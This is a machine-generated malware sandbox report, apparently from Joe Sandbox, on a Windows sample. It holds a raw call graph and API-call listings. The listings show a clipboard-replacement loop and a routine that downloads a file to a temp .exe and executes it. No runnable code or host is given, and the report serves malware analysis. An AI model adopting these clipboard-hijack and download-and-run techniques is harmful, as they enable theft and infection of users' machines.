65261 432ec1 65259->65261 65262 432ed6 65259->65262 65344 42eac9 20 API calls __dosmaperr 65261->65344 65275 432f29 65262->65275 65265 432e97 65349 42a59d 26 API calls _Deallocate 65265->65349 65267 432ed1 65346 432f00 LeaveCriticalSection __wsopen_s 65267->65346 65268 432ec6 65345 42eab6 20 API calls __dosmaperr 65268->65345 65271->65224 65272->65235 65273->65227 65274->65259 65276 432f53 65275->65276 65277 432f3b 65275->65277 65278 4332bd 65276->65278 65284 432f98 65276->65284 65359 42eab6 20 API calls __dosmaperr 65277->65359 65377 42eab6 20 API calls __dosmaperr 65278->65377 65280 432f40 65360 42eac9 20 API calls __dosmaperr 65280->65360 65283 4332c2 65378 42eac9 20 API calls __dosmaperr 65283->65378 65285 432f48 65284->65285 65287 432fa3 65284->65287 65292 432fd3 65284->65292 65285->65267 65361 42eab6 20 API calls __dosmaperr 65287->65361 65289 432fa8 65362 42eac9 20 API calls __dosmaperr 65289->65362 65293 432fec 65292->65293 65295 433012 65292->65295 65296 43302e 65292->65296 65293->65295 65302 432ff9 65293->65302 65294 432fb0 65379 42a59d 26 API calls _Deallocate 65294->65379 65363 42eab6 20 API calls __dosmaperr 65295->65363 65366 4336a7 21 API calls 3 library calls 65296->65366 65298 433017 65364 42eac9 20 API calls __dosmaperr 65298->65364 65350 43d365 65302->65350 65303 433045 65304 43346a _free 20 API calls 65303->65304 65307 43304e 65304->65307 65305 43301e 65365 42a59d 26 API calls _Deallocate 65305->65365 65306 433197 65309 43320d 65306->65309 65312 4331b0 GetConsoleMode 65306->65312 65310 43346a _free 20 API calls 65307->65310 65311 433211 ReadFile 65309->65311 65313 433055 65310->65313 65314 433285 GetLastError 65311->65314 65315 43322b 65311->65315 65312->65309 65316 4331c1 65312->65316 65317 43307a 65313->65317 65318 43305f 65313->65318 65319 433292 65314->65319 65320 4331e9 65314->65320 65315->65314 65321 433202 65315->65321 65316->65311 65322 4331c7 ReadConsoleW 65316->65322 65369 4347ee 65317->65369 65367 42eac9 20 API calls __dosmaperr 65318->65367 65375 42eac9 20 API calls __dosmaperr 65319->65375 65338 433029 __fread_nolock 65320->65338 65372 42ea93 20 API calls __dosmaperr 65320->65372 65333 433250 65321->65333 65334 433267 65321->65334 65321->65338 65322->65321 65327 4331e3 GetLastError 65322->65327 65323 43346a _free 20 API calls 65323->65285 65327->65320 65328 433064 65368 42eab6 20 API calls __dosmaperr 65328->65368 65329 433297 65376 42eab6 20 API calls __dosmaperr 65329->65376 65373 432c45 31 API calls 2 library calls 65333->65373 65335 43327e 65334->65335 65334->65338 65374 432a85 29 API calls __fread_nolock 65335->65374 65338->65323 65339 433283 65339->65338 65340->65248 65341->65252 65342->65258 65343->65265 65344->65268 65345->65267 65346->65252 65347->65250 65348->65265 65349->65252 65351 43d372 65350->65351 65352 43d37f 65350->65352 65380 42eac9 20 API calls __dosmaperr 65351->65380 65355 43d38b 65352->65355 65381 42eac9 20 API calls __dosmaperr 65352->65381 65354 43d377 65354->65306 65355->65306 65357 43d3ac 65382 42a59d 26 API calls _Deallocate 65357->65382 65359->65280 65360->65285 65361->65289 65362->65294 65363->65298 65364->65305 65365->65338 65366->65303 65367->65328 65368->65338 65370 434755 __fread_nolock 28 API calls 65369->65370 65371 434804 65370->65371 65371->65302 65372->65338 65373->65338 65374->65339 65375->65329 65376->65338 65377->65283 65378->65294 65379->65285 65380->65354 65381->65357 65382->65354 65383 402bad RegCreateKeyExW 65384 402bdb RegSetValueExW 65383->65384 65385 402bef 65383->65385 65384->65385 65386 402bf4 RegCloseKey 65385->65386 65387 402bfd 65385->65387 65386->65387 65388 a09cee 65389 a09cfd 65388->65389 65392 a0a48e 65389->65392 65397 a0a4a9 65392->65397 65393 a0a4b2 CreateToolhelp32Snapshot 65394 a0a4ce Module32First 65393->65394 65393->65397 65395 a0a4dd 65394->65395 65398 a09d06 65394->65398 65399 a0a14d 65395->65399 65397->65393 65397->65394 65400 a0a178 65399->65400 65401 a0a1c1 65400->65401 65402 a0a189 VirtualAlloc 65400->65402 65401->65401 65402->65401 65403 404b8e 65404 404b9a SafeSQueue 65403->65404 65409 40fb0c 65404->65409 65408 404bba Hash Concurrency::SchedulerPolicy::_Initialize 65411 40fb11 65409->65411 65412 404ba3 65411->65412 65414 40fb2d Concurrency::details::GlobalCore::Initialize 65411->65414 65433 42ad7e 65411->65433 65440 42f450 7 API calls 2 library calls 65411->65440 65417 4051d0 65412->65417 65441 42860d RaiseException 65414->65441 65416 4103cc 65418 4051dc SafeSQueue __Cnd_init 65417->65418 65420 4051f4 __Mtx_init 65418->65420 65452 40ce32 28 API calls std::_Throw_Cpp_error 65418->65452 65421 40521b 65420->65421 65453 40ce32 28 API calls std::_Throw_Cpp_error 65420->65453 65444 4010ea 65421->65444 65427 40526a 65429 40527f Hash 65427->65429 65455 401128 30 API calls 2 library calls 65427->65455 65456 401109 65429->65456 65432 4052a4 Concurrency::SchedulerPolicy::_Initialize 65432->65408 65438 4336a7 std::_Locinfo::_Locinfo_dtor 65433->65438 65434 4336e5 65443 42eac9 20 API calls __dosmaperr 65434->65443 65436 4336d0 RtlAllocateHeap 65437 4336e3 65436->65437 65436->65438 65437->65411 65438->65434 65438->65436 65442 42f450 7 API calls 2 library calls 65438->65442 65440->65411 65441->65416 65442->65438 65443->65437 65460 40d313 65444->65460 65447 401103 65449 40cef3 65447->65449 65484 42e114 65449->65484 65452->65420 65453->65421 65454 40ce32 28 API calls std::_Throw_Cpp_error 65454->65427 65455->65427 65457 401115 __Mtx_unlock 65456->65457 65458 401122 65457->65458 65809 40ce32 28 API calls std::_Throw_Cpp_error 65457->65809 65458->65432 65464 40d06d 65460->65464 65463 40ce32 28 API calls std::_Throw_Cpp_error 65463->65447 65465 40d0c3 65464->65465 65466 40d095 GetCurrentThreadId 65464->65466 65467 40d0c7 GetCurrentThreadId 65465->65467 65468 40d0ed 65465->65468 65470 40d0a0 GetCurrentThreadId 65466->65470 65475 40d0bb 65466->65475 65471 40d0d6 65467->65471 65469 40d186 GetCurrentThreadId 65468->65469 65473 40d10d 65468->65473 65469->65471 65470->65475 65472 40d1dd GetCurrentThreadId 65471->65472 65471->65475 65472->65475 65482 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65473->65482 65474 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65478 4010f6 65474->65478 65475->65474 65478->65447 65478->65463 65479 40d145 GetCurrentThreadId 65479->65471 65480 40d118 __Xtime_diff_to_millis2 65479->65480 65480->65471 65480->65475 65480->65479 65483 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65480->65483 65482->65480 65483->65480 65485 42e121 65484->65485 65486 42e135 65484->65486 65507 42eac9 20 API calls __dosmaperr 65485->65507 65498 42e0cb 65486->65498 65489 42e126 65508 42a59d 26 API calls _Deallocate 65489->65508 65492 42e14a CreateThread 65494 42e175 65492->65494 65495 42e169 GetLastError 65492->65495 65529 42dfc0 65492->65529 65493 405257 65493->65427 65493->65454 65510 42e03d 65494->65510 65509 42ea93 20 API calls __dosmaperr 65495->65509 65518 434d2a 65498->65518 65501 43346a _free 20 API calls 65502 42e0e4 65501->65502 65503 42e103 65502->65503 65504 42e0eb GetModuleHandleExW 65502->65504 65505 42e03d __Thrd_start 22 API calls 65503->65505 65504->65503 65506 42e10d 65505->65506 65506->65492 65506->65494 65507->65489 65508->65493 65509->65494 65511 42e04a 65510->65511 65512 42e06e 65510->65512 65513 42e050 CloseHandle 65511->65513 65514 42e059 65511->65514 65512->65493 65513->65514 65515 42e068 65514->65515 65516 42e05f FreeLibrary 65514->65516 65517 43346a _free 20 API calls 65515->65517 65516->65515 65517->65512 65519 434d37 65518->65519 65520 434d77 65519->65520 65521 434d62 HeapAlloc 65519->65521 65525 434d4b std::_Locinfo::_Locinfo_dtor 65519->65525 65528 42eac9 20 API calls __dosmaperr 65520->65528 65523 434d75 65521->65523 65521->65525 65524 42e0db 65523->65524 65524->65501 65525->65520 65525->65521 65527 42f450 7 API calls 2 library calls 65525->65527 65527->65525 65528->65524 65530 42dfcc _Atexit 65529->65530 65531 42dfd3 GetLastError ExitThread 65530->65531 65532 42dfe0 65530->65532 65545 431eda GetLastError 65532->65545 65534 42dfe5 65565 435571 65534->65565 65537 42dffb 65572 401169 65537->65572 65546 431ef0 65545->65546 65547 431ef6 65545->65547 65580 435111 11 API calls 2 library calls 65546->65580 65549 434d2a std::_Locinfo::_Locinfo_dtor 20 API calls 65547->65549 65551 431f45 SetLastError 65547->65551 65550 431f08 65549->65550 65552 431f10 65550->65552 65581 435167 11 API calls 2 library calls 65550->65581 65551->65534 65554 43346a _free 20 API calls 65552->65554 65556 431f16 65554->65556 65555 431f25 65555->65552 65557 431f2c 65555->65557 65558 431f51 SetLastError 65556->65558 65582 431d4c 20 API calls pre_c_initialization 65557->65582 65583 42df7d 167 API calls 2 library calls 65558->65583 65560 431f37 65563 43346a _free 20 API calls 65560->65563 65562 431f5d 65564 431f3e 65563->65564 65564->65551 65564->65558 65566 435596 65565->65566 65567 43558c 65565->65567 65584 434e93 5 API calls 2 library calls 65566->65584 65569 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65567->65569 65571 42dff0 65569->65571 65570 4355ad 65570->65567 65571->65537 65579 4354a4 10 API calls 2 library calls 65571->65579 65585 40155a Sleep 65572->65585 65587 405800 65572->65587 65573 401173 65576 42e199 65573->65576 65777 42e074 65576->65777 65578 42e1a6 65579->65537 65580->65547 65581->65555 65582->65560 65583->65562 65584->65570 65586 4016d5 65585->65586 65588 40580c SafeSQueue 65587->65588 65589 4010ea std::_Cnd_initX 35 API calls 65588->65589 65590 405821 __Cnd_signal 65589->65590 65591 405839 65590->65591 65644 40ce32 28 API calls std::_Throw_Cpp_error 65590->65644 65593 401109 std::_Cnd_initX 28 API calls 65591->65593 65594 405842 65593->65594 65600 4016df 65594->65600 65621 4029f4 InternetOpenW 65594->65621 65597 405849 Hash Concurrency::SchedulerPolicy::_Initialize 65597->65573 65645 40fde6 65600->65645 65602 4016eb Sleep 65646 40cc10 65602->65646 65605 40cc10 28 API calls 65606 401711 65605->65606 65607 40171b OpenClipboard 65606->65607 65608 401943 Sleep 65607->65608 65609 40172b GetClipboardData 65607->65609 65608->65607 65610 40173b GlobalLock 65609->65610 65611 40193d CloseClipboard 65609->65611 65610->65611 65615 401748 _strlen 65610->65615 65611->65608 65612 40cbc7 28 API calls std::system_error::system_error 65612->65615 65613 40cc10 28 API calls 65613->65615 65615->65611 65615->65612 65615->65613 65616 4018d2 EmptyClipboard GlobalAlloc 65615->65616 65650 402e66 167 API calls 3 library calls 65615->65650 65652 40caa6 26 API calls _Deallocate 65615->65652 65616->65615 65617 4018eb GlobalLock 65616->65617 65651 426990 65617->65651 65620 401905 GlobalUnlock SetClipboardData GlobalFree 65620->65615 65622 402a27 InternetOpenUrlW 65621->65622 65624 402b9c 65621->65624 65623 402a3d GetTempPathW GetTempFileNameW 65622->65623 65622->65624 65658 42a88e 65623->65658 65626 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65624->65626 65628 402bab 65626->65628 65637 40e76b 65628->65637 65629 402b8b InternetCloseHandle InternetCloseHandle 65629->65624 65630 402aa8 ListArray 65631 402ac0 InternetReadFile WriteFile 65630->65631 65632 402b00 CloseHandle 65630->65632 65631->65630 65660 402960 65632->65660 65634 402b14 65634->65629 65634->65634 65635 402b2b ShellExecuteExW 65634->65635 65635->65629 65636 402b72 WaitForSingleObject CloseHandle 65635->65636 65636->65629 65768 40deea 65637->65768 65642 40e810 65642->65597 65643 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65775 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65643->65775 65644->65591 65645->65602 65647 40cc2c _strlen 65646->65647 65653 40cbc7 65647->65653 65649 401704 65649->65605 65650->65615 65651->65620 65652->65615 65654 40cbfa 65653->65654 65656 40cbd6 BuildCatchObjectHelperInternal 65653->65656 65654->65656 65657 40cb5c 28 API calls 4 library calls 65654->65657 65656->65649 65657->65656 65659 402a76 CreateFileW 65658->65659 65659->65629 65659->65630 65661 40298b ListArray _wcslen 65660->65661 65670 42b454 65661->65670 65665 4029b8 65692 404333 65665->65692 65668 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65669 4029f2 65668->65669 65669->65634 65696 42b106 65670->65696 65673 402823 65674 402832 SafeSQueue 65673->65674 65722 4032dd 65674->65722 65676 402846 65738 403b8b 65676->65738 65678 40285a 65679 402888 65678->65679 65680 40286c 65678->65680 65744 403112 65679->65744 65765 40329a 167 API calls 65680->65765 65683 402895 65747 403c20 65683->65747 65685 4028a7 65757 403cc2 65685->65757 65686 40287f std::ios_base::_Ios_base_dtor Concurrency::SchedulerPolicy::_Initialize 65686->65665 65688 4028c4 65689 404333 26 API calls 65688->65689 65690 4028e3 65689->65690 65766 40329a 167 API calls 65690->65766 65693 4029e4 65692->65693 65694 40433b 65692->65694 65693->65668 65767 40cc96 26 API calls 2 library calls 65694->65767 65697 42b133 65696->65697 65698 42b142 65697->65698 65699 42b15a 65697->65699 65711 42b137 65697->65711 65700 42eac9 __dosmaperr 20 API calls 65698->65700 65701 42a747 __fassign 162 API calls 65699->65701 65704 42b147 65700->65704 65702 42b165 65701->65702 65705 42b170 65702->65705 65706 42b307 65702->65706 65703 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65707 4029a4 65703->65707 65708 42a59d pre_c_initialization 26 API calls 65704->65708 65712 42b218 WideCharToMultiByte 65705->65712 65714 42b17b 65705->65714 65719 42b1b5 WideCharToMultiByte 65705->65719 65709 42b334 WideCharToMultiByte 65706->65709 65710 42b312 65706->65710 65707->65673 65708->65711 65709->65710 65710->65711 65713 42eac9 __dosmaperr 20 API calls 65710->65713 65711->65703 65712->65714 65715 42b243 65712->65715 65713->65711 65714->65711 65718 42eac9 __dosmaperr 20 API calls 65714->65718 65715->65714 65717 42b24c GetLastError 65715->65717 65717->65714 65721 42b25b 65717->65721 65718->65711 65719->65714 65720 42b274 WideCharToMultiByte 65720->65710 65720->65721 65721->65710 65721->65711 65721->65720 65723 4032e9 SafeSQueue 65722->65723 65724 40467c 167 API calls 65723->65724 65725 403315 65724->65725 65726 40484d 167 API calls 65725->65726 65727 40333e 65726->65727 65728 40458c 26 API calls 65727->65728 65729 40334d 65728->65729 65730 40dde3 167 API calls 65729->65730 65737 403392 std::ios_base::_Ios_base_dtor 65729->65737 65732 403362 65730->65732 65731 4033ce Concurrency::SchedulerPolicy::_Initialize 65731->65676 65734 40458c 26 API calls 65732->65734 65732->65737 65733 40c618 167 API calls 65733->65731 65735 403373 65734->65735 65736 404c14 167 API calls 65735->65736 65736->65737 65737->65731 65737->65733 65739 403b97 SafeSQueue 65738->65739 65740 4042af 167 API calls 65739->65740 65741 403ba3 65740->65741 65742 403bc7 Concurrency::SchedulerPolicy::_Initialize 65741->65742 65743 4034fb 167 API calls 65741->65743 65742->65678 65743->65742 65745 404356 28 API calls 65744->65745 65746 40312c ListArray 65745->65746 65746->65683 65748 403c2c SafeSQueue 65747->65748 65749 40c618 167 API calls 65748->65749 65750 403c4f 65749->65750 65751 4042af 167 API calls 65750->65751 65752 403c59 65751->65752 65753 403c9c Concurrency::SchedulerPolicy::_Initialize 65752->65753 65756 4034fb 167 API calls 65752->65756 65753->65685 65754 403c7a 65754->65753 65755 4046ca 167 API calls 65754->65755 65755->65753 65756->65754 65758 403cce __EH_prolog3_catch 65757->65758 65759 4042af 167 API calls 65758->65759 65762 403ce7 65759->65762 65760 403d17 65761 4046ca 167 API calls 65760->65761 65763 403d70 Concurrency::SchedulerPolicy::_Initialize 65761->65763 65762->65760 65764 40369f 40 API calls 65762->65764 65763->65688 65764->65760 65765->65686 65766->65686 65767->65693 65776 40f22a EnterCriticalSection 65768->65776 65770 40def4 65771 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65770->65771 65772 40ced2 65771->65772 65773 40cec7 CloseHandle 65771->65773 65774 40ced6 GetCurrentThreadId 65772->65774 65773->65774 65774->65643 65775->65642 65776->65770 65786 431f5e GetLastError 65777->65786 65779 42e083 ExitThread 65780 42e0a1 65783 42e0b4 65780->65783 65784 42e0ad CloseHandle 65780->65784 65783->65779 65785 42e0c0 FreeLibraryAndExitThread 65783->65785 65784->65783 65787 431f7d 65786->65787 65788 431f77 65786->65788 65790 434d2a std::_Locinfo::_Locinfo_dtor 17 API calls 65787->65790 65792 431fd4 SetLastError 65787->65792 65806 435111 11 API calls 2 library calls 65788->65806 65791 431f8f 65790->65791 65794 431f97 65791->65794 65807 435167 11 API calls 2 library calls 65791->65807 65793 42e07f 65792->65793 65793->65779 65793->65780 65805 4354f6 10 API calls 2 library calls 65793->65805 65796 43346a _free 17 API calls 65794->65796 65798 431f9d 65796->65798 65797 431fac 65797->65794 65799 431fb3 65797->65799 65800 431fcb SetLastError 65798->65800 65808 431d4c 20 API calls pre_c_initialization 65799->65808 65800->65793 65802 431fbe 65803 43346a _free 17 API calls 65802->65803 65804 431fc4 65803->65804 65804->65792 65804->65800 65805->65780 65806->65787 65807->65797 65808->65802 65809->65458 65810 40239e 65811 402561 PostQuitMessage 65810->65811 65812 4023b2 65810->65812 65816 40255f 65811->65816 65813 4023b9 DefWindowProcW 65812->65813 65814 4023d0 65812->65814 65813->65816 65815 4029f4 167 API calls 65814->65815 65814->65816 65815->65816

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                                                                                                                                                                                            • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 00401749
                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 00401778
                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 004018BC
                                                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004018D2
                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040193D
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                                                          • String ID: i
                                                                                                                                                                                                                                                                          • API String ID: 1583243082-3865851505
                                                                                                                                                                                                                                                                          • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                                                          • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D
                                                                                                                                                                                                                                                                          Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                                                                                                                                                                                                                          • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                                          • String ID: .exe$<$ShareScreen
                                                                                                                                                                                                                                                                          • API String ID: 3323492106-493228180
                                                                                                                                                                                                                                                                          • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                                                          • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                                                                                                                                                                                                                          Function 00A0A48E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A0A4B6
                                                                                                                                                                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 00A0A4D6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A09000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_a09000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                          • Instruction ID: b2f29f896515408588927e54fed472113860492bef12ca526b042dec7853e074
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9F096361007186BD7203BF9BC8DBAE76E8AF69724F100529F646914C0DBB5EC454A62
                                                                                                                                                                                                                                                                          Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 83 43d095-43d0aa call 42eab6 call 42eac9 77->83 84 43d0ac-43d0f5 call 43cd0a 77->84 85 43d07b-43d082 call 42eac9 78->85 83->85 94 43d162-43d16b GetFileType 84->94 95 43d0f7-43d100 84->95 92 43d35e-43d364 85->92 96 43d1b4-43d1b7 94->96 97 43d16d-43d19e GetLastError call 42ea93 CloseHandle 94->97 99 43d102-43d106 95->99 100 43d137-43d15d GetLastError call 42ea93 95->100 103 43d1c0-43d1c6 96->103 104 43d1b9-43d1be 96->104 97->85 113 43d1a4-43d1af call 42eac9 97->113 99->100 105 43d108-43d135 call 43cd0a 99->105 100->85 108 43d1ca-43d218 call 4396c7 103->108 109 43d1c8 103->109 104->108 105->94 105->100 116 43d21a-43d226 call 43cf1b 108->116 117 43d228-43d24c call 43cabd 108->117 109->108 113->85 116->117 123 43d250-43d25a call 4335cd 116->123 124 43d25f-43d2a2 117->124 125 43d24e 117->125 123->92 127 43d2c3-43d2d1 124->127 128 43d2a4-43d2a8 124->128 125->123 129 43d2d7-43d2db 127->129 130 43d35c 127->130 128->127 132 43d2aa-43d2be 128->132 129->130 133 43d2dd-43d310 CloseHandle call 43cd0a 129->133 130->92 132->127 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->130
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0043D150
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043D157
                                                                                                                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0043D16D
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043D176
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0043D312
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043D319
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                          • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                          • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A
                                                                                                                                                                                                                                                                          Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
